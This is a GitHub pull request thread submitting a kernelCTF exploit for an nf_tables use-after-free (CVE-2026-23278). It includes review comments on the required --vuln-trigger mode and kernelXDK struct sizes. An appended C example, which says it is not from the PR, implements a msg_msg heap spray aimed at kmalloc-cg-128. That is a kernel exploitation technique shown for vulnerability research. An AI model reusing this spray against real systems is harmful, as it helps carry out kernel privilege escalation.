
Add kernelCTF CVE-2026-23278_cos (#exp462) #374

Open

G0RiyA wants to merge 6 commits into google:master from G0RiyA:kernelctf-CVE-2026-23278

Conversation


G0RiyA commented Apr 30, 2026

kernelCTF submission for CVE-2026-23278 (nf_tables catchall break-statement UAF).

Submission ID: exp462

Target: cos-121-18867.381.30

Note: vuln-verify CI fails because the fix commit (7cb9a23d7ae4) has not been backported to the 6.6 stable branch yet. It exists in v7.0-rc4 and was backported to v6.12.78+, but not to 6.6.x which COS-121-18867.381.30 is based on.


google-cla Bot commented Apr 30, 2026

Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA).

View this failed invocation of the CLA check for more information.

For the most up to date status, view the checks section at the bottom of the pull request.

G0RiyA force-pushed the kernelctf-CVE-2026-23278 branch from 04f598b to b702377 on April 30, 2026 00:16
G0RiyA added 2 commits May 9, 2026 22:46
Replace hardcoded CORE_PATTERN_PHYS and struct unix_address_user /
BIND_LEN with per-target kernelXDK definitions using AddSymbol and
AddStruct, following the recommended pattern from the libxdk sample
exploit documentation.

Update exploit.md line references and code blocks to match.
matrizzo self-assigned this May 21, 2026
matrizzo added the recheck (Triggers kernelCTF PR verification again) label May 27, 2026
matrizzo (Collaborator) commented

Hi, thanks for your submission.

This exploit needs to support the --vuln-trigger flag (https://google.github.io/security-research/kernelctf/rules.html#exploit). This should only trigger the bug on a KASAN kernel and nothing more (see the rules in the link). In addition to that, it should get the size of msg_msg from kernelXDK.

G0RiyA added 3 commits May 28, 2026 03:39
Implement the required --vuln-trigger mode that triggers the
nft_map_catchall break-statement bug and causes a UAF write
detectable by KASAN, without running the full exploit chain.

G0RiyA commented May 27, 2026

Added --vuln-trigger support in the latest commits. It triggers the nft_map_catchall break-statement bug and causes a UAF write detectable by KASAN, without running the full exploit chain.

Regarding msg_msg size: MSG_MSG_SIZE (0x80) is the total allocation size used for heap spray targeting kmalloc-cg-128. The actual msg_msg header size is obtained from kernelXDK via target.GetStructSize("msg_msg") at line 698.
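The two points raised in the review above (a --vuln-trigger mode switch, and taking the msg_msg size from the target at runtime instead of hard-coding it), as an added C example that is not code from this PR, from the kernelCTF rules or from libxdk/kernelXDK. The 48-byte msg_msg header and 4096-byte page are assumed illustrative values standing in for what target.GetStructSize("msg_msg") would return; the nf_tables trigger itself is not included, and the spray function needs a Linux host with SysV IPC.

```c
/*
 * Added example (not code from the PR or from libxdk/kernelXDK).
 * Demonstrates: parsing --vuln-trigger, and sizing a msg_msg heap spray
 * for kmalloc-cg-128 from a runtime msg_msg header size rather than a
 * hard-coded constant. Values marked ASSUMED are illustrative.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

/* ASSUMED stand-in for kernelXDK's target.GetStructSize("msg_msg"):
 * the real exploit must read this from the target description. */
#define ASSUMED_MSG_MSG_HDR 48
#define ASSUMED_PAGE_SIZE   4096

/* Target slab named in the PR: kmalloc-cg-128. */
#define MSG_MSG_SIZE 0x80

enum run_mode { MODE_FULL = 0, MODE_VULN_TRIGGER = 1 };

/* Select the run mode from argv; only "--vuln-trigger" is recognised. */
enum run_mode parse_mode(int argc, char **argv)
{
    for (int i = 1; i < argc; i++)
        if (strcmp(argv[i], "--vuln-trigger") == 0)
            return MODE_VULN_TRIGGER;
    return MODE_FULL;
}

/* Payload length whose msg_msg (header + inline data) totals exactly
 * slab_size bytes. Returns 0 if the header alone exceeds the slab. */
size_t msg_payload_len(size_t hdr_size, size_t slab_size)
{
    return slab_size > hdr_size ? slab_size - hdr_size : 0;
}

/* Size the kernel allocates for the first msg_msg of a 'len'-byte message:
 * inline data is capped at DATALEN_MSG = PAGE_SIZE - sizeof(msg_msg), and
 * the remainder goes into msg_msgseg chunks, which a one-object-per-message
 * spray must avoid. */
size_t msg_first_alloc_size(size_t hdr_size, size_t len, size_t page_size)
{
    size_t datalen_msg = page_size - hdr_size;
    size_t inline_len = len < datalen_msg ? len : datalen_msg;
    return inline_len + hdr_size;
}

/* Number of msg_msgseg chunks a 'len'-byte message needs (0 = none).
 * msg_msgseg holds only a 'next' pointer, so DATALEN_SEG = PAGE_SIZE - 8. */
size_t msg_seg_count(size_t hdr_size, size_t len, size_t page_size)
{
    size_t datalen_msg = page_size - hdr_size;
    if (len <= datalen_msg) return 0;
    size_t rest = len - datalen_msg;
    size_t datalen_seg = page_size - sizeof(void *);
    return (rest + datalen_seg - 1) / datalen_seg;
}

/* Queue 'count' messages of 'payload' bytes on a private SysV queue so each
 * msgsnd allocates one msg_msg in the chosen cache. Returns the number
 * queued, or -1 if the queue could not be created. */
int spray_msg_msg(int count, size_t payload, unsigned char fill)
{
    int qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
    if (qid < 0) return -1;
    struct { long mtype; unsigned char mtext[ASSUMED_PAGE_SIZE]; } m;
    if (payload > sizeof(m.mtext)) payload = sizeof(m.mtext);
    m.mtype = 1;
    memset(m.mtext, fill, payload);
    int sent = 0;
    for (int i = 0; i < count; i++)
        if (msgsnd(qid, &m, payload, 0) == 0) sent++;
    return sent;
}

int main(int argc, char **argv)
{
    size_t hdr = ASSUMED_MSG_MSG_HDR;   /* real exploit: target.GetStructSize("msg_msg") */
    size_t payload = msg_payload_len(hdr, MSG_MSG_SIZE);

    /* Sanity check before spraying: the header must fit and the message
     * must stay inline, otherwise the spray lands in the wrong cache. */
    if (payload == 0 || msg_first_alloc_size(hdr, payload, ASSUMED_PAGE_SIZE) != MSG_MSG_SIZE
        || msg_seg_count(hdr, payload, ASSUMED_PAGE_SIZE) != 0) {
        fprintf(stderr, "msg_msg header %zu does not fit kmalloc-cg-%d\n", hdr, MSG_MSG_SIZE);
        return 1;
    }
    printf("msg_msg header %zu bytes -> msgsnd payload %zu bytes for kmalloc-cg-%d\n",
           hdr, payload, MSG_MSG_SIZE);

    if (parse_mode(argc, argv) == MODE_VULN_TRIGGER) {
        puts("--vuln-trigger: only the KASAN-detectable trigger would run here");
        return 0;
    }
    int n = spray_msg_msg(16, payload, 0x41);
    printf("queued %d messages\n", n);
    return n < 0;
}
```

Changing only the assumed header size changes the msgsnd payload length that reaches kmalloc-cg-128, which is why the size has to come from kernelXDK per target; the check in main refuses to spray if the computed message would not total 0x80 bytes or would spill into msg_msgseg.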
